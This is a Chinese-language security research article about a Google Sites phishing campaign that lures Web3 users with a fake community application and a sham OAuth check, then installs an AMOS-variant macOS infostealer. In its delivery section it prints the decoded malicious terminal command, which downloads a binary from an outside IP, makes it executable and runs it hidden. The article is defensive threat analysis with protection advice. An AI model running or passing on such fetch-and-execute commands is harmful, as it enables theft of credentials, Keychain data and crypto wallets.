返回文章库

Google Sites 社群钓鱼攻击分析与 macOS 窃密木马深度剖析

查找币 漏洞披露 安全研究 Web3安全 区块链安全
Google Sites 社群钓鱼攻击分析与 macOS 窃密木马深度剖析

查找币安全研究院

链上取证分析 | Web3 风险核验 | Web3 事件响应
以合法授权、证据保全、隐私保护和可复核流程为前提,不要求用户在线提交敏感凭证或非公开材料。

查看研究院 研究报告中心
> **威胁等级**:🔴 高危 > **影响平台**:macOS > **投递方式**:钓鱼页面 + 恶意脚本/命令 > **最终载荷**:AMOS 变体信息窃取木马 --- ## 事件概述 2026 年 7 月 8 日,查找币安全团队接到来自安全研究员 Bruce Xu(@brucexu_eth)的威胁情报反馈,发现一个高度伪装的钓鱼攻击活动。攻击者利用 **Google Sites** 的可信域名托管恶意页面,将自身包装成某知名 Builder 社群的申请入口,诱导受害者完成看似正常的"入群申请"流程,最终在 macOS 系统上植入信息窃取木马。 经查找币监控系统确认,该攻击活动已进入活跃传播阶段,相关 IOC(入侵指标)已同步至威胁情报库。 --- ## 攻击链全景分析 本次攻击活动呈现**多阶段、高伪装、双通道投递**的显著特征,完整攻击链路如下: ``` 受害者访问 Google Sites 钓鱼页面 ↓ 第一阶段:伪装社群申请表单(收集信息) ↓ 第二阶段:伪造 OAuth 安全校验页面(建立信任) ↓ 双通道投递:.scpt 文件 或 Terminal Command ↓ 下载并执行 AMOS 变体窃密木马 ↓ 窃取浏览器凭证、Keychain、加密钱包等敏感数据 ``` --- ## 第一阶段:以"社群申请"为诱饵的信息收集 攻击者选择 **Google Sites** 作为基础设施,利用 `sites.google.com` 这一高信誉域名的 SSL 证书与搜索权重,极大降低了目标用户的心理防线。 页面完整模拟了社群申请表 UI,包含以下精心设计的字段: | 表单字段 | 攻击目的 | |---------|---------| | Where are you based? | 获取地理位置信息,用于后续定向攻击 | | What best describes you? | 区分 founder、builder、VC 等身份,筛选高价值目标 | | What are you building, learning, or looking for? | 强化 Web3 场景代入感 | | Share one relevant link | 收集社交账号/项目链接,扩展攻击面 | | What do you hope to get from this group? | 增强"人工审核"的真实性 | | Quick check — which of these is NOT allowed? | 伪装反诈规则检查,建立"安全社群"认知 | 页面文案刻意强调 *"verified founders, builders, VCs, speakers and influencers"* 及 *"Only serious members, no scams"*,营造出高门槛、严审核的社群氛围,诱导受害者放下戒备。 --- ## 第二阶段:伪造 OAuth 安全校验的技术欺骗 表单提交后,攻击者并未进入任何真实的审核流程,而是跳转至精心伪造的**安全校验页面**。该页面具备以下技术欺骗特征: - **视觉伪装**:采用 Google 风格蓝色页头,与官方页面高度一致 - **错误信息伪造**:展示 `api_error_401`、`401 Unauthorized` 等技术性错误 - **协议术语堆砌**:提及 OAuth 2.0、`openid`、`profile`、`email` 等标准授权范围 - **失败日志模拟**:呈现类似系统日志的输出,增强技术可信度 这一阶段的核心目的在于:**利用技术术语制造"安全验证必要性"的假象**,为后续诱导执行恶意代码建立合理场景。 --- ## 双通道投递机制:.scpt 与 Terminal Command 在 "Verification Method" 页面中,攻击者提供了两种恶意载荷投递路径: ### 路径一:下载 .scpt 文件(推荐) 诱导用户下载 AppleScript 文件,利用 macOS 用户对 `.scpt` 扩展名认知不足的弱点,绕过 Gatekeeper 等安全机制。 ### 路径二:Terminal Command 手动执行 提供可直接复制粘贴到终端的 Base64 编码命令,解码后核心逻辑如下(URL 已去活化): ```bash clear echo "Loading... Please Wait" curl -s hxxp://86[.]54[.]25[.]213/d/unix32385485 > /tmp/unix001 chmod +x /tmp/unix001 /tmp/unix001 > /dev/null 2>&1 & disown ``` ### 恶意命令技术分析 | 行为 | 风险特征 | |------|---------| | `curl -s` 静默下载 | 抑制输出,隐藏网络请求细节 | | 写入 `/tmp/unix001` | 使用临时目录,规避常规文件监控 | | `chmod +x` 赋予执行权限 | 准备恶意二进制文件 | | `> /dev/null 2>&1 & disown` | 后台运行并脱离终端会话,实现持久化 | 更值得警惕的是,攻击页面还内置了 **macOS Security FAQ**,详细解释 `.scpt` 文件是什么、如何运行、如何应对 Gatekeeper 弹窗、下载失败时如何改用 Terminal 等。这套"技术帮助文档"实为**攻击引导手册**,旨在提前消解用户对 macOS 安全提示的犹豫心理。 --- ## 恶意载荷分析:AMOS 变体窃密木马 静态逆向分析显示,下载的 `unix32385485` 文件是一个 **macOS Mach-O 格式的二进制木马**,其行为特征与 **AMOS(Atomic macOS Stealer)** 家族高度吻合。 ### 主要窃取目标 - 🔑 **Keychain**:系统级密码管理库 - 🌐 **浏览器数据**:Chrome、Safari 等浏览器的凭证与 Cookies - 📝 **Apple Notes**:可能包含敏感笔记和双重验证码 - 🍪 **Safari Cookies**:会话劫持的关键数据 - 💰 **加密货币钱包**:多种主流钱包扩展的数据文件 - 🖥️ **系统信息**:硬件配置、用户信息等 该木马采用模块化设计,具备良好的代码混淆和反分析能力,能够静默收集上述数据并回传至攻击者控制的服务器。 --- ## 防护建议与安全提醒 面对此类高伪装度的钓鱼攻击,查找币安全团队建议: 1. **警惕"申请制"社群邀请**:对任何要求填写详细个人信息、下载文件或执行命令的"入群流程"保持高度怀疑 2. **验证域名真实性**:即使页面托管在 `sites.google.com` 等可信域名,也应仔细核对页面 URL 路径和内容 3. **拒绝执行陌生命令**:任何要求在 Terminal 中粘贴执行 Base64 编码命令的行为都应视为恶意 4. **启用 Gatekeeper 强校验**:保持 macOS 安全设置默认值,不轻易绕过签名验证 5. **定期检查 Keychain 与浏览器凭证**:发现异常授权及时撤销 6. **使用钱包硬件签名**:为加密资产设置独立于浏览器的交易签名机制 --- ## 结语 本次攻击活动展现了 Web3 领域钓鱼攻击的**高度专业化趋势**:攻击者不仅利用 Google Sites 等可信基础设施,还构建了完整的"申请-验证-投递"攻击剧本,甚至配备 FAQ 引导文档来降低受害者的安全警觉。 查找币监控系统已第一时间将该事件涉及的全部 IOC 接入威胁检测引擎。开发者与安全团队可通过查找币监控系统 API 对相关域名、IP 和文件哈希进行自动化检测,及时识别潜在风险。 > **安全建议**:建议社区成员关注查找币安全团队的实时威胁情报推送,并定期对终端设备进行安全巡检。 --- **本文由查找币安全团队整理发布**
在文章库中查看和回复